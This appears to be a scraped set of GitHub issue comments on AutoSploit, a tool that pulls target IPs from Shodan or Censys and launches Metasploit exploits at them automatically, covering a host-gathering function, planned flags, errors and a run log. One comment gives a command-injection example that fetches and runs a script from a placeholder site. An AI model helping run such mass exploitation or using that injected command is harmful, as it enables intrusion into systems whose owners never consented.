ImportError: No module named _curses
Would it be an issue to create your own shodan library for this, something along the lines of:
import json
import time
import threading
import base64
import requests
import lib.settings
import lib.output
def get_token(encoded):
encoded = encoded.strip()
token, n = encoded.split(":")
for _ in range(int(n)):
token = base64.b64decode(token)
return token
def gather_hosts(query):
discovered = set()
try:
animation_text = "gathering hosts relevant to query {}...".format(query)
t = threading.Thread(target=lib.settings.animation, args=(animation_text,))
t.daemon = True
t.start()
token = get_token(open(lib.settings.TOKEN_PATH).read())
req = requests.get(lib.settings.SHODAN_API_LINK.format(key=token, query=query))
data = json.loads(req.content)
for match in data["matches"]:
discovered.add(match["ip_str"])
file_path = "{}/hosts.lst".format(lib.settings.GATHERED_HOSTS_PATH)
lib.settings.write_to_file(discovered, file_path)
output_text = "done, successfully gathered {} hosts".format(len(discovered))
padding_needed = len(animation_text) - len(output_text)
lib.output.info(output_text + "{}".format(" " * padding_needed))
lib.settings.STOP_ANIMATION = True
return file_path
except Exception as e:
lib.output.error("caught exception '{}' while gathering hosts".format(str(e)))
lib.settings.shutdown()
def view_gathered_hosts(host_file):
with open(host_file) as hosts:
for i, host in enumerate(hosts, start=1):
lib.output.info("[{}] {}".format(i, host.strip()))
return
That should grab at least 100 IP addresses from shodan
A list of arguments that we should be able to pass:
-ip
provide a specific IP addr to exploit-C
scan censys instead of Shodan, Shodan will be default—both
scan both Shodan and Censys—proxy
run behind a proxy, we don’t need to implement a Tor flag if we use this-e
provide a text file containing user provided exploits, it will be saved into a JSON file for future use-E
provide a specific exploit to use (if it fails we can either exit or continue)—ethics
display #6 :)The goal is to use the arguments, and go to the core functionality we have now if no arguments are passed
I’ll add more when I think of things that will be useful, ideas are welcomed
We need to gracefully handle exploit failures in order to facilitate proper rollover to the next one. Since we wish to automate as much as possible, it is important to handle exploits failures in an automated manner as well. Some tools that automate MSF functionality do so by employing msfrpc
. I'll be looking into a way of implementing similar measures as a fix to this issue.
I have a REAL dumbass NOOB question.
Getting the following error.
#--Author : Vector/NullArray | _ |_ | | | || ||| |_
#--Twitter: @Real__Vector | | | | | . |_ | . | | . | | |
#--Type : Mass Exploiter ||||| ||| |||||
#--Version: 1.0.0 |_|
##############################################
[+]Please provide your platform specific search query.
[+]I.E. 'IIS' will return a list of IPs belonging to IIS servers.
$ IIS
[+]Please stand by while results are being collected...
[!]Critical. An error was raised with the following error message.
Invalid API key
root@kl01:~/apps/AutoSploit#
Thoughts?
TIA!!!
Could someone give a sample of Censys API Token and Censys ID? I tried to use API Credentials under the censys.io My Account option, but it showed error as following:
File "autosploit.py", line 5, in
main()
File "/opt/AutoSploit/autosploit/main.py", line 50, in main
AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits)
File "/opt/AutoSploit/lib/cmdline/cmd.py", line 137, in single_run_args
opt.searchQuery, proxy=headers[0], agent=headers[1]
File "/opt/AutoSploit/api_calls/censys.py", line 44, in censys
raise AutoSploitAPIConnectionError(str(e))
lib.errors.AutoSploitAPIConnectionError: 'results'
Thanks.
I think it’s time to create v1.0 release on GitHub
I have clone AutoSploit on termux (Android nougat 7.0) ; the clone have been successful but when I put
python autosploit.py
and I press enter it lauch a while and show me 3 bugs:
file /data/data/com.termux/files/home/AutoSploit/autosploit.py line 10 main in
file /data/data/com.termux/files/home/AutoSploit/lib/autoput.py raw_input (NameError :raw_input not defined)
file /data/data/com.termux/files/home/AutoSploit/main.py choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]")
What ever i do
use relevant modules[y/N]: Y or N
it starts using all the modules in the database
[?] specify full path to a whitelist file, otherwise hit enter:
[+] you will need to do some configuration to MSF.
please keep in mind that sending connections back to your local host is probably not a smart idea.
[?] enter your workspace name: root
[?] enter your LHOST: 192.168.1.1
[?] enter your LPORT: 4444
[?] a total of 9 modules have been sorted by relevance, would you like to display them[y/N]: y
exploit/unix/webapp/joomla_contenthistory_sqli_rce
exploit/multi/http/joomla_http_header_rce
exploit/multi/http/joomla_http_header_rce
exploit/unix/webapp/joomla_akeeba_unserialize
exploit/unix/webapp/joomla_comjce_imgmanager
exploit/unix/webapp/joomla_contenthistory_sqli_rce
exploit/unix/webapp/joomla_media_upload_exec
exploit/multi/http/joomla_http_header_rce
exploit/unix/webapp/joomla_contenthistory_sqli_rce
[?] use relevant modules[y/N]: y
[+] starting exploitation with sorted modules (total of 9)
[+] launching exploit 'exploit/windows/ftp/ms09_053_ftpd_nlst' against host '192.168.1.4'
How can i selesc to use just one single module?
File "autosploit.py", line 5, in
main()
File "/opt/metasploit-framework/Autosploit/autosploit/main.py", line 78, in main
AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits)
File "/opt/metasploit-framework/Autosploit/lib/cmdline/cmd.py", line 174, in single_run_args
msf_path=opt.pathToFramework
File "/opt/metasploit-framework/Autosploit/lib/exploitation/exploiter.py", line 87, in start_exploit
makedirs(current_host_path)
File "/usr/lib/python2.7/os.py", line 157, in makedirs
mkdir(name, mode)
OSError: [Errno 17] File exists: '/opt/metasploit-framework/Autosploit/autosploit_out/2018-04-06_18h21m40s/192.168.1.7'
The os.system call does not properly sanitize input collected from Shodan.
Its likely SHODAN isn't going to do something bad, but in the unlikely event the API is compromised or someone wants to cause harm, the os.system calls should be properly sanitized or passed to subprocess.Popen without shell=true. Example: ip=; wget badsite.com/badcode.sh|bash;
Usind Autosploit under recent Kali/Linux I get the following error when searching for hosts with shodan:
`Traceback` (most recent call last):'plex'... File "autosploit.py", line 5, in <module> main() File "/root/AutoSploit/autosploit/main.py", line 50, in main AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits) File "/root/AutoSploit/lib/cmdline/cmd.py", line 147, in single_run_args keys["shodan"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] File "/root/AutoSploit/api_calls/shodan.py", line 44, in shodan raise AutoSploitAPIConnectionError(str(e)) lib.errors.AutoSploitAPIConnectionError: 'matches'
Any Ideas how I could fix that?
My AutoSploit was cloned from github.
Why not set both RHOST = ip, and RHOSTS = ip ?
thx
Can you please add an option to use a custom payload instead.
Thanks
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.